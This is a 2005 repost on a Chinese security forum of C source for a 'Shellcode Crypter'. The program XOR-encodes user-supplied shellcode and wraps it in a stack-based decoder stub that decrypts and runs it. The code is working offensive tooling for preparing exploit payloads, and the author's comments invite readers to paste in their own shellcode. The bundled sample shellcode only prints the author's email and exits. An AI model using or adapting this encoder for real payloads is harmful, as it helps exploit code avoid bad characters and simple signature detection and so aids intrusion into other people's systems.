‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]Shellcode Crypter is a shellcode encryption utility

冰血封情

老林

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6828 
精华
834 
积分
36067 
阅读权限
255 
性别
男 
来自
中国 
在线时间
597 小时 
注册时间
2004-6-25 
最后登录
2008-11-18 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2005-1-29 08:25  只看该作者

[转载]Shellcode Crypter is a shellcode encryption utility

文章作者:Shen139
复制内容到剪贴板
代码:
/*
*    Shellcode Crypter (Linux _ Windows) (?!?) ALPHA_beta
*        Coded by Shen139    21-01-2005 - 13:00
*        shen139 (at) eviltime [dot] c0m
*
* ...
* //PUT HERE YOUR SHELLCODE
* char shellcode[]="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x6a\x0a\x68\x2e\x63\x6f\x6d\x68\x74\x69\x6d"
* "\x65\x68\x65\x76\x69\x6c\x68\x31\x33\x39\x40\x68\x73\x68\x65\x6e\x89\xe1\xb2\x15\xb0\x04\xcd\x80\x31"
* "\xc0\x31\xdb\xb0\x01\xcd\x80\xc3\x90\x90";
* ...
*
* Put tHERE your shellcode, then run the program and copy the output! That's your shellcode:
* crypted and encapsulated into a decrypter that decrypt it into the stack and then execute it!
*
* -[...You won't worry anymore for 0x00 in your shellcode...]-
*
* Enjoy :D
*
*/

//PUT HERE YOUR SHELLCODE
char shellcode[]="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x6a\x0a\x68\x2e\x63\x6f\x6d\x68\x74\x69\x6d"
"\x65\x68\x65\x76\x69\x6c\x68\x31\x33\x39\x40\x68\x73\x68\x65\x6e\x89\xe1\xb2\x15\xb0\x04\xcd\x80\x31"
"\xc0\x31\xdb\xb0\x01\xcd\x80\xc3\x90\x90";

//Set SHELLCODE_LENGHT with 0 if your shellcode does not contain \x00
// otherwise set it with the lenght of the shellcode
#define SHELLCODE_LENGHT    0

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define MAGIC_SUFFIX_PARTa        "\\x33\\xC9\\x8B\\xDC\\x80\\x33"
#define    MAGIC_SUFFIX_PARTb        "\\x43\\x41\\x83\\xF9"
#define MAXIC_SUFFIX_PARTc        "\\x75\\xF6\\x54\\xC3"


int main()
{
char*flShellcode=(char*)malloc(sizeof(shellcode)+4);
int i,b,SLLen,xor,found;

    printf("Shellcode Crypter\n Coded by Shen139\n  shen139 (at) eviltime [dot] com\n\n\n");

// stage1

    SLLen=(SHELLCODE_LENGHT==0)?strlen(shellcode):SHELLCODE_LENGHT;

    memcpy(flShellcode,shellcode,SLLen);

    for(xor=1;xor<=0xFF;xor++)
    {
        found=1;
        for(b=0;b<SLLen;b++)
        {
            if(flShellcode[b]==xor)
            {
                found=0;
                break;
            }
        }
        if(found==1)
            break;
    }

    printf(" - Xoring with 0x%X\n\n\n - Shellcode:\n\n",xor);

// stage2

    while(SLLen%4!=0)
        flShellcode[SLLen++]=    (unsigned char)0x90;

// stage3

    for(i=SLLen-4;i>=0;i-=4)
    {
        printf("\\x68");

        for(b=0;b<4;b++)
            printf("\\x%X",(unsigned char)shellcode[i+b]^xor);
    }

// stage4

    printf(MAGIC_SUFFIX_PARTa);

    printf("\\x%X",xor);

    printf(MAGIC_SUFFIX_PARTb);

    printf("\\x%X",(unsigned char)strlen(shellcode));

    printf(MAXIC_SUFFIX_PARTc);

    printf("\n\n");

return 0;
}

/*EOF*/
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题